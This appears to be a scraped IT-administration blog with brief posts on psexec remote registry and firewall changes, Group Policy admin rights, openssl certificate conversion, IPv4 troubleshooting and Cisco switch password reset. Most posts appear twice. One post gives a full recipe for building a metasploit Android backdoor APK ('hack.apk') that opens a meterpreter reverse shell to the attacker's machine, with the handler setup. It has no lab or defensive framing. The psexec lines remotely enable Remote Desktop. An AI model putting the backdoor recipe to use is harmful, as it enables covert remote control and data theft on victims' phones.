psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
psexec \\remotecomputername netsh firewall set service remoteadmin enable
psexec \\remotecomputername netsh firewall set service remotedesktop enable:
Thursday, December 12, 2019
Local administrator permission for domain user
How to give local computer administrator permission for users in domain.
I.E. ; Normally domain users cannot change control settings, modifications in c drive and windows, cannot install applications. But some organizations need this. For this do as follows.
Edit the Default group policy (or any group policy you are willing to link with the certain ou)
Go Computer Configuration > Policies > Windows Settings > Security Settings
There right click on Restricted Groups and click on Add Group
Click Browse, type Domain users (Or any other user group you are willing to add locally in their administrators' group) and click Check Names.
Click OK twise.
Click Add under “This group is a member of:”
Add the “Administrators” Group.
Add “Remote Desktop Users” (Adding remote desktop group is for give them the ability to do remote desktop. If you dont need this to your domain users forget this.)
Click OK twice
I.E. ; Normally domain users cannot change control settings, modifications in c drive and windows, cannot install applications. But some organizations need this. For this do as follows.
Edit the Default group policy (or any group policy you are willing to link with the certain ou)
Go Computer Configuration > Policies > Windows Settings > Security Settings
There right click on Restricted Groups and click on Add Group
Click Browse, type Domain users (Or any other user group you are willing to add locally in their administrators' group) and click Check Names.
Click OK twise.
Click Add under “This group is a member of:”
Add the “Administrators” Group.
Add “Remote Desktop Users” (Adding remote desktop group is for give them the ability to do remote desktop. If you dont need this to your domain users forget this.)
Click OK twice
Convert crt certificate to pfx format.
openssl pkcs12 -export -out certificate.pfx -inkey privateKey.key -in certificate.crt -certfile more.crt
* openssl – the command for executing OpenSSL
* pkcs12 – the file utility for PKCS#12 files in OpenSSL
* -export -out certificate.pfx – export and save the PFX file as certificate.pfx
* -inkey privateKey.key – use the private key file privateKey.key as the private key to combine with the certificate.
* -in certificate.crt – use certificate.crt as the certificate the private key will be combined with.
* -certfile more.crt – This is optional, this is if you have any additional certificates you would like to include in the PFX file.
* openssl – the command for executing OpenSSL
* pkcs12 – the file utility for PKCS#12 files in OpenSSL
* -export -out certificate.pfx – export and save the PFX file as certificate.pfx
* -inkey privateKey.key – use the private key file privateKey.key as the private key to combine with the certificate.
* -in certificate.crt – use certificate.crt as the certificate the private key will be combined with.
* -certfile more.crt – This is optional, this is if you have any additional certificates you would like to include in the PFX file.
Android backdoor apk using metasploit
In terminal,
msfvenom -p android/meterpreter/reverse_tcp LHOST=pc_ip_address LPORT=4444 R > /root/hack.apk
copy the apk file in the phone. and install app by openning apk
run
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost host_ip_address(ex: 192.168.43.18)
set lport 4444
type,
exploit
In phone run the installed app on phone.
meterpreter session will open. run commands. type help for get commands.
msfvenom -p android/meterpreter/reverse_tcp LHOST=pc_ip_address LPORT=4444 R > /root/hack.apk
copy the apk file in the phone. and install app by openning apk
run
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost host_ip_address(ex: 192.168.43.18)
set lport 4444
type,
exploit
In phone run the installed app on phone.
meterpreter session will open. run commands. type help for get commands.
IPv4 automatic configuring issue in windows
Step 1: Run > cmd > ipconfig /all
Expand
Looks to see which IP is the preferred and if autoconfiguration is on.
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82567LM-3 Gigabit Network Connection
Physical Address. . . . . . . . . : 00-23-24-08-30-57
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::8508:6cb9:5112:f8c9 (Preferred)
Autoconfiguration IPv4 Address. . : 169.254.248.201(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
IPv4 Address. . . . . . . . . . . : 192.168.1.136(Duplicate)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
DNS Servers . . . . . . . . . . . : 192.168.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Expand
Looks to see which IP is the preferred and if autoconfiguration is on.
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82567LM-3 Gigabit Network Connection
Physical Address. . . . . . . . . : 00-23-24-08-30-57
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::8508:6cb9:5112:f8c9 (Preferred)
Autoconfiguration IPv4 Address. . : 169.254.248.201(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
IPv4 Address. . . . . . . . . . . : 192.168.1.136(Duplicate)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
DNS Servers . . . . . . . . . . . : 192.168.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Cisco switch commands
poe on
power inline auto
power inline static
poe off
power inline never
show mac addresses connected interface
show mac address-table int giga...
Reset cisco switch login
Step 1:
Power off the switch first, then press and hold the mode button while you power on the switch again. Hold it for about 15 seconds until the SYS led is solid green, and then release it.
The switch should then give you this prompt:
switch:
Step 2:
To initialize the flash file system, run the command:
switch: flash_init
Initializing Flash...
flashfs[0]: 5 files, 1 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 32514048
flashfs[0]: Bytes used: 8059904
flashfs[0]: Bytes available: 24454144
flashfs[0]: flashfs fsck took 10 seconds.
...done Initializing Flash.
The switch will now print a bunch of messages about the flash memory, hopefully one of them will be ‘done initializing flash’ as above shown
Step 3:
You can now list the contents of your flash by running
switch: dir flash:
Directory of flash: /
2 -rwx 12300 config.text
4 -rwx 1906 private-config.text
5 -rwx 676 vlan.dat
6 -rwx 8040418 c2960-lanbasek9-mz.122-50.SE3.bin
7 -rwx 2072 multiple-fs
There should be a file named ‘config.text’, as you can rename this file as follows:
switch: rename flash:config.text flash: oldconfig.backup
Step 4:
To further boot the switch run the boot command as:
switch: boot
This will start the boot you are used to. When the switch is booted up, you will realize that the configuration is gone. But you are enabled on the switch now.
Step 5:
Now change the passwords,
Switch#config
Switch(config)#line console 0
Switch(config)#password yourpassword
Switch(config)#line vty 0 4
Switch(config)#password yourpassword
Switch(config)#enable password yourpassword
Switch(config)#end
Switch#copy running-configuration startup-configuration
power inline auto
power inline static
poe off
power inline never
show mac addresses connected interface
show mac address-table int giga...
Reset cisco switch login
Step 1:
Power off the switch first, then press and hold the mode button while you power on the switch again. Hold it for about 15 seconds until the SYS led is solid green, and then release it.
The switch should then give you this prompt:
switch:
Step 2:
To initialize the flash file system, run the command:
switch: flash_init
Initializing Flash...
flashfs[0]: 5 files, 1 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 32514048
flashfs[0]: Bytes used: 8059904
flashfs[0]: Bytes available: 24454144
flashfs[0]: flashfs fsck took 10 seconds.
...done Initializing Flash.
The switch will now print a bunch of messages about the flash memory, hopefully one of them will be ‘done initializing flash’ as above shown
Step 3:
You can now list the contents of your flash by running
switch: dir flash:
Directory of flash: /
2 -rwx 12300 config.text
4 -rwx 1906 private-config.text
5 -rwx 676 vlan.dat
6 -rwx 8040418 c2960-lanbasek9-mz.122-50.SE3.bin
7 -rwx 2072 multiple-fs
There should be a file named ‘config.text’, as you can rename this file as follows:
switch: rename flash:config.text flash: oldconfig.backup
Step 4:
To further boot the switch run the boot command as:
switch: boot
This will start the boot you are used to. When the switch is booted up, you will realize that the configuration is gone. But you are enabled on the switch now.
Step 5:
Now change the passwords,
Switch#config
Switch(config)#line console 0
Switch(config)#password yourpassword
Switch(config)#line vty 0 4
Switch(config)#password yourpassword
Switch(config)#enable password yourpassword
Switch(config)#end
Switch#copy running-configuration startup-configuration
Subscribe to:
Posts (Atom)